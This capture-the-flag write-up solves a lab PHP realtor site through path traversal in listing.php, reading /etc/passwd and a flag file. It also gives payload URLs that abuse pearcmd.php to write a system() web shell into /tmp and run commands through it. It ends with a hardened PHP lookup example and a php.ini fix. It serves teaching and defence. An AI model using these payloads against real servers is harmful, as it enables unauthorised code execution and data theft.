Mapleton
Room Description

https://dashboard.webverselabs-pro.com/mystery-challenges/mapleton
Briefing
Maggie has shown Mapleton homes for thirty years. Her son Eli rebuilt the office website one weekend after PHP 5 came out — they've been swapping photos and prices on it ever since, but nobody's looked at the templating since the original Bush administration. The office laptop password is on a sticky note by the coffee pot. The flag is in the realtor's home directory; the route in lives in plain sight.
Initial Analysis
This is going to be a quick and easy challenge, so we won't be going into too many details.
We have a realtor service where we can browse houses.

This challenge is an all-roads-lead-to-Rome kind of situation: yes, there are several endpoints to look at, but they all lead you to the same place.
<ul class="nav__menu">
<li><a href="/" class="nav__link ">Home</a></li>
<li><a href="/listings.php" class="nav__link nav__link--active">Buy</a></li>
<li><a href="/contact.php" class="nav__link ">Sell</a></li>
<li><a href="/listings.php?town=Mapleton" class="nav__link">Areas</a></li>
<li><a href="/about.php" class="nav__link ">About</a></li>
</ul>
<div class="nav__cta">
<a href="/contact.php" class="btn btn--primary btn--sm">List your home</a>
</div>
The only place of interest is /listing.php; /contact.php is a form we can fill in to get in contact with the owners, but we don't really see our response anywhere, and /about.php is just static text.
Finding the bug
We have several listings available to us that we can browse through.

If we open any one of them, we can see that the URL is showing us the following information:

https://b2c492f8-3970-mapleton-b1502.mystery-challenges.webverselabs-pro.com/listing.php?listing=12-elm-street.html
We can see that 12-elm-street.html is specifically being called to render this page for us. This looks like a typical Local File Inclusion vulnerability through Path Traversal.
If we change 12-elm-street to anything else, we can see that the system is trying to read the file path we supply to it.

Exploitation
Intended path
Knowing that we have LFI, we need to try Path Traversal now. The most logical file to attack is /etc/passwd.
We just need to add ../ until we find how many directories deep we are. Turns out it's 4!

We see a user account, and we know based on the description the flag is there, so we can just try to read:
../../../../home/realtor/flag.txt

Unintended path
https://labs.watchtowr.com/form-tools-we-need-to-talk-about-php/
This is funny, because I thought I had found this unintended route and was happy to share it through the writeup, but someone had beaten me to it already (@7s26simon's writeup). I had seen this in a CTF, and usually with these LFI challenges I try to find the source code to see what the mistake is, so I started looking around for files and managed to find /usr/local/lib/php/pearcmd.php.

Since we are getting a 200 response, with no errors, it definitely exists. The CTF solution I am referring to is the following, whilst actual research related to pearcmd.php is at the top of this paragraph.
https://medium.com/@sudo_von/php-lfi-sourceless-guessy-web-rce-flag-seetf-bcd4e7f195af
We can quite literally re-create the payload from either the research or the CTF in this environment:
/?+config-create+/&page=../../../../../usr/local/lib/php/pearcmd.ph&/<?=system($_GET[‘cmd’])?>+../../../../../tmp/sudo_von.php
That is the payload for the random CTF; we can adapt it to our environment.
/listing.php?listing=../../../../usr/local/lib/php/pearcmd.php&+config-create+/<?=system($_GET['cmd'])?>+/rce.php
First I tried it like that. Unfortunately, it seemed as though it didn't work, and then I thought that maybe we don't have write permissions there, so I had to try /tmp.

/listing.php?listing=../../../../usr/local/lib/php/pearcmd.php&+config-create+/<?=system($_GET['cmd'])?>+/tmp/lfi2rce.php

Well, that definitely worked.

Now, we already know where the flag is from the original vulnerability; I just wanted to show another way to go about it.
/listing.php?listing=../../../../tmp/lfi2rce.php&cmd=cat+/home/realtor/flag.txt
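Both routes above depend on the listing parameter reaching a file include unchecked. The following is an added example of a hardened lookup, not the challenge's own code (the source of listing.php is never shown in this writeup); the LISTING_DIR path and the resolveListing name are assumptions made for the illustration.

```php
<?php
// Added example: hardened listing lookup. LISTING_DIR and resolveListing()
// are hypothetical names; the real listing.php source is not on this page.
declare(strict_types=1);

const LISTING_DIR = '/var/www/html/listings'; // assumed home of the *.html fragments

function resolveListing(string $requested, string $baseDir = LISTING_DIR): ?string
{
    // 1. Allowlist the shape of the name: "12-elm-street.html" passes, while
    //    anything with "/", "..", a NUL byte or another extension is rejected.
    if (preg_match('/\A[a-z0-9][a-z0-9-]*\.html\z/', $requested) !== 1) {
        return null;
    }

    // 2. Canonicalise, then confirm the result still sits inside the base
    //    directory. realpath() resolves symlinks and returns false when the
    //    file does not exist.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// A query string such as ?listing[]=x produces an array, so check the type first.
$raw  = $_GET['listing'] ?? '';
$path = is_string($raw) ? resolveListing($raw) : null;

if ($path === null) {
    http_response_code(404);
    exit('Listing not found');
}

// 3. Emit the fragment as data. readfile() never passes the file through the
//    PHP engine, unlike include/require, so file contents are not executed.
readfile($path);
```

Setting register_argc_argv = Off in php.ini additionally stops the web SAPI from turning the query string into argv, which is the behaviour the pearcmd.php route relies on.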
